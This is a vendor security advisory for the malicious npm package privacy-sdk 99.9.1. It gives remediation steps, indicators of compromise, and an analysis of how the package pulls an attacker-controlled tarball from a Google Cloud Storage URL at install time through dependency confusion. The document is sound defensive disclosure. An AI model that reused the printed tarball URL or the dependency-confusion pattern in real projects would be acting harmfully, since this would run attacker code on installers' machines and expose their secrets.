Which versions of privacy-sdk are malicious?

The following npm versions of privacy-sdk are flagged malicious: 99.9.1. Treat any of these as compromised.

How do I remediate privacy-sdk if I installed it?

Remove privacy-sdk from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is privacy-sdk part of a known attack campaign?

Yes — privacy-sdk is associated with the IN-MAL-2026-005042, IN-MAL-2026-005041 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect privacy-sdk in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking privacy-sdk and packages like it before any post-install script runs.

Malicious package

privacy-sdknpm

Malicious code in privacy-sdk (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5451

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall privacy-sdk

What this malware does

[email protected] is a hollow wrapper (index.js is module.exports = {}, blank description, blank author) whose sole runtime dependency is declared as a raw tarball URL: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.8.9.tgz". On npm install privacy-sdk, npm fetches that tarball directly from the GCS bucket — bypassing the npm registry's publication, audit, and integrity-hash mechanisms — and installs it, executing any lifecycle scripts (preinstall/install/postinstall) bundled inside. The bucket and depenconf path do not correspond to any identifiable publisher, the URL has no integrity field, and the bytes at that URL are mutable by whoever controls the bucket. The version 99.9.1 is the canonical high-version dependency-confusion pattern used to outrank an organization's internal privacy-sdk package, and the generic name compounds that risk. The package has no advertised functionality of its own; its only effect on install is to deliver attacker-controlled code into the installer's environment via the smuggled tarball.

Malicious versions

1 flagged

99.9.1

Indicators of compromise (SHA-256)

3fde8996f6e327af3c05557575254a0ded23e8f31a7b4f5219e1c26615ec3a28

5c92b5d6dae289f8667ca24f2a941473b65e560f6937874f68ff26ed24d58969

Frequently asked questions

No. privacy-sdk on npm has been identified as a malicious package (version 99.9.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005042IN-MAL-2026-005041

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection